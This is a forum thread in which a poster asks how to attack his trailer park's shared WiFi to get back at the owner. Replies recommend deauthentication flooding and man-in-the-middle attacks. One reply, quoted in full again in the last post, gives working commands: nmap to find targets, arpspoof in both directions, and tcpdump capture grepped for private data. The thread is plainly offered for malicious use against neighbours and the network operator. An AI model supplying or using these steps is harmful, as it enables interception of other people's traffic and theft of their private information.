Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


What can I do to my trailer park while connected to their WiFi? filter_list
Author
Message
What can I do to my trailer park while connected to their WiFi? #1
They have like some shitty Wi-Fi at the front desk that runs through the entire trailer park. Is there anyone on this website that could help me plot against th.eir server or something? The owner is quite a prick to my family members. I apologize for this being one of my first posts I'm simply new here and have lurked for a few days now - I intend to be more active.

Reply

RE: What can I do to my trailer park while connected to their WiFi? #2
Quite a few.
One way without even being connected is deauthentication spam. Effectively breaks the WiFi for everyone else.

But better yet, do "man-in-the-middle" attacks. ARP spoofing, for instance. Fuck all HTTP sites up with redirects to stupid crap and stop HTTPS sites from being accessed completely. Or, just, you know, capture private information.

Reply

RE: What can I do to my trailer park while connected to their WiFi? #3
(youll need a basic level of understanding for this & linux, if you dont have either ask and Ill explain)

On discovering the targets IP

To get the MAC addresses and IP's of targets (run as root)
nmap -O -sP ip/24

On arpspoofing and packet capturing

First of all make sure you are root. (sudo -s)

Route packets sent from your router to your target:
arpspoof -t gateway target & >/dev/null

Route packets sent from your target to your router:
arpspoof -t target gateway & >/dev/null

Capture packets being routed with tcpdump:
tcpdump -A -i any > dump

Grep for what you want and then profit!
You can essentially monitor large portions of their internet browsing.
(This post was last modified: 09-10-2016, 06:31 AM by superMAUS.)

Reply

RE: What can I do to my trailer park while connected to their WiFi? #4
(09-10-2016, 06:26 AM)superMAUS Wrote: (youll need a basic level of understanding for this & linux, if you dont have either ask and Ill explain)

On discovering the targets IP

To get the MAC addresses and IP's of targets (run as root)
nmap -O -sP ip/24

On arpspoofing and packet capturing

First of all make sure you are root. (sudo -s)

Route packets sent from your router to your target:
arpspoof -t gateway target & >/dev/null

Route packets sent from your target to your router:
arpspoof -t target gateway & >/dev/null

Capture packets being routed with tcpdump:
tcpdump -A -i any > dump

Grep for what you want and then profit!
You can essentially monitor large portions of their internet browsing.

could i accomplish this through Kali? Unfortunately I am back home from the vacation totally forgot about posting the thread, so until next year... i will have to learn everything i can possibly do and become a mastermind Smile

Reply







Users browsing this thread: 1 Guest(s)